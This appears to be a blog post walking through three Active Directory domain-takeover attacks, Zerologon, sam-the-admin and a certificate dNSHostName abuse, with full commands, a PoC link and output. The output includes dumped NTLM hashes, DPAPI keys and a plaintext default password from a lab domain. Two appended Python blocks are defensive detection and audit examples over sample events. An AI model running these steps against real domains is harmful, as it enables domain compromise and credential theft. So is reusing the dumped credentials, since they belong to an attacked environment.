Several methods of Active Directory domain privilege escalation
A rather handy intranet privilege-escalation vulnerability, affecting multiple Windows Server versions from Windows Server 2008 R2 through Windows Server 2019. It can be exploited as long as the attacker can reach the target domain controller and knows the DC's computer name. It does not require the attacking machine to be joined to the domain, nor that it runs Windows. The stable way to exploit it is to reset the target DC's machine-account password, use the DC's credential to DCSync and obtain domain-admin credentials, and then restore the DC's password. The reason the DC credential is not used directly for remote command execution is that the DC machine account cannot log on, but it does hold DCSync rights and can therefore retrieve the credentials of any user in the domain.
During exploitation the DC's credential stored in the domain (ntds.dit) is reset. When the credential stored in the domain no longer matches the one held locally in the registry / lsass, the target DC drops out of the domain, so the DC's credential must be restored as soon as possible after the reset.
└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Performing authentication attempts...
[127.0.0.1:1088 ... 10.10.10.135:135 ... OK ] Strict chain ...
[127.0.0.1:1088 ... 10.10.10.135:49158 ... OK ] Strict chain ...
======================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
python3 secretsdump.py scaner/ad$@10.10.10.135 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.secdb:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
scaner.secmoonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::
[*] Kerberos keys grabbed
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[*] NL$KM
[*] Cleaning up...
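The Zerologon step above leaves a specific footprint on the DC: a computer-account password reset of the DC's own account performed by an anonymous Netlogon session. The following detection is an added example, not part of the original post; it runs over constructed sample events shaped like Windows Security event 4742 ("A computer account was changed"), and the DC name set is an assumption for the lab on this page.

```python
"""Flag DC machine-account password resets made by ANONYMOUS LOGON,
the footprint of the CVE-2020-1472 reset described above.
Added example; events below are constructed samples, not real logs."""
from dataclasses import dataclass


@dataclass
class Event4742:
    """Minimal fields of a 4742 'A computer account was changed' event."""
    subject_user: str       # principal that made the change
    subject_domain: str
    target_account: str     # computer account that was modified
    password_last_set: str  # "-" when the password was not reset


def is_dc_account(target, dc_names):
    """True if the target account (e.g. 'AD$') belongs to a DC in dc_names."""
    return target.rstrip("$").upper() in {d.upper() for d in dc_names}


def detect_zerologon_reset(events, dc_names):
    """Return events where a DC computer account had its password reset
    by NT AUTHORITY\\ANONYMOUS LOGON, i.e. with no authenticated principal."""
    hits = []
    for ev in events:
        if not is_dc_account(ev.target_account, dc_names):
            continue
        if ev.password_last_set == "-":       # attribute change only
            continue
        if (ev.subject_user.upper() == "ANONYMOUS LOGON"
                and ev.subject_domain.upper() == "NT AUTHORITY"):
            hits.append(ev)
    return hits


# Constructed sample events for the lab domain on this page (hypothetical).
SAMPLE_EVENTS = [
    Event4742("ANONYMOUS LOGON", "NT AUTHORITY", "AD$", "2022-05-20 10:02:11"),  # Zerologon
    Event4742("AD$", "MOONSEC", "AD$", "2022-05-20 09:00:00"),                   # normal self-rotation
    Event4742("Administrator", "MOONSEC", "12SERVER-DB$", "2022-05-20 10:05:00"),  # member server
    Event4742("ANONYMOUS LOGON", "NT AUTHORITY", "AD$", "-"),                    # no password reset
]

if __name__ == "__main__":
    for hit in detect_zerologon_reset(SAMPLE_EVENTS, {"AD"}):
        print(f"ALERT: {hit.target_account} password reset by "
              f"{hit.subject_domain}\\{hit.subject_user} at {hit.password_last_set}")
```

Only the first sample event matches; a DC rotating its own password or an administrator resetting a member server does not trigger the rule.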
Exploit (PoC) repository: https://github.com/WazeHell/sam-the-admin
python sam_the_admin.py "moonsec/test:pass123" -dc-ip 10.10.10.135 -shell
Detailed write-up: https://mp.weixin.qq.com/s/B9iZIYezRfFR6wGnAgUNXQ
Details: https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA
Find the CA
certutil -config - -ping
Request a certificate
certipy req 'moonsec.lab/test:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template User -debug
Test the certificate
certipy auth -pfx test.pfx -debug
Check the ms-DS-MachineAccountQuota attribute
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'DC=moonsec,DC=lab' ms-DS-MachineAccountQuota
Use the bloodyAD tool to create a machine account.
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 addComputer sec123 pass123
A machine account can be created as long as ms-DS-MachineAccountQuota > 0.
Update the machine account's DNS Host Name
Change the machine account's DNS Host Name to the domain controller's name, ad.moonsec.lab
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 setAttribute 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName '["ad.moonsec.lab"]'
Check where DNSHostName now points
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName
Run Certipy to request a machine certificate; the DNS Host Name can be seen to have become ad.moonsec.lab
certipy req 'moonsec.lab/sec123$:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template Machine
Verify the certificate
certipy auth -pfx ad.pfx -debug
Dump the hashes with Impacket's secretsdump.py
python secretsdump.py 'moonsec.lab/ad$@moonsec.lab' -hashes :76e0ba3e2c8333b929064f85dcc0a824
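The procedure above relies on two conditions a defender can audit: a non-zero ms-DS-MachineAccountQuota, and a machine account whose dNSHostName has been pointed at a domain controller's name. The following audit is an added example, not part of the original post nor of bloodyAD or Certipy; it runs over constructed records shaped like the attributes the bloodyAD getObjectAttributes calls above return, and the DC name set is an assumption for this lab.

```python
"""Audit computer objects for the dNSHostName abuse walked through above.
Added example; the records below are constructed samples, not LDAP output."""

DOMAIN = "moonsec.lab"          # lab domain from the page
DOMAIN_CONTROLLERS = {"AD"}     # assumption: short host names of the DCs


def expected_dns_host_name(sam_account_name, domain=DOMAIN):
    """A computer's dNSHostName should be <sAMAccountName without $>.<domain>."""
    return f"{sam_account_name.rstrip('$').lower()}.{domain.lower()}"


def audit_computers(computers, maq):
    """computers: dicts with sAMAccountName and dNSHostName; maq: the domain's
    ms-DS-MachineAccountQuota. Returns (account, reason) findings."""
    findings = []
    if maq > 0:
        findings.append(("ms-DS-MachineAccountQuota",
                         f"quota is {maq}; any domain user may add machine accounts"))
    seen = {}  # dNSHostName -> first account that claimed it
    for c in computers:
        sam = c["sAMAccountName"]
        dns = (c.get("dNSHostName") or "").lower()
        if not dns:
            continue
        if dns != expected_dns_host_name(sam):
            reason = "dNSHostName does not match its own account name"
            if dns.split(".")[0].upper() in DOMAIN_CONTROLLERS:
                reason = "dNSHostName points at a domain controller"
            findings.append((sam, reason))
        if dns in seen:
            findings.append((sam, f"dNSHostName duplicates {seen[dns]}"))
        seen.setdefault(dns, sam)
    return findings


# Constructed sample records; sec123$ mirrors the account created on this page.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "AD$", "dNSHostName": "ad.moonsec.lab"},
    {"sAMAccountName": "12SERVER-DB$", "dNSHostName": "12server-db.moonsec.lab"},
    {"sAMAccountName": "sec123$", "dNSHostName": "ad.moonsec.lab"},
]

if __name__ == "__main__":
    for account, reason in audit_computers(SAMPLE_COMPUTERS, maq=10):
        print(f"FINDING: {account}: {reason}")
```

Setting the quota to 0 removes the precondition named above, and the two sec123$ findings are what to look for on accounts that already exist.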
Original article by mOon; if reproducing, please credit the source: https://www.moonsec.com/5213.html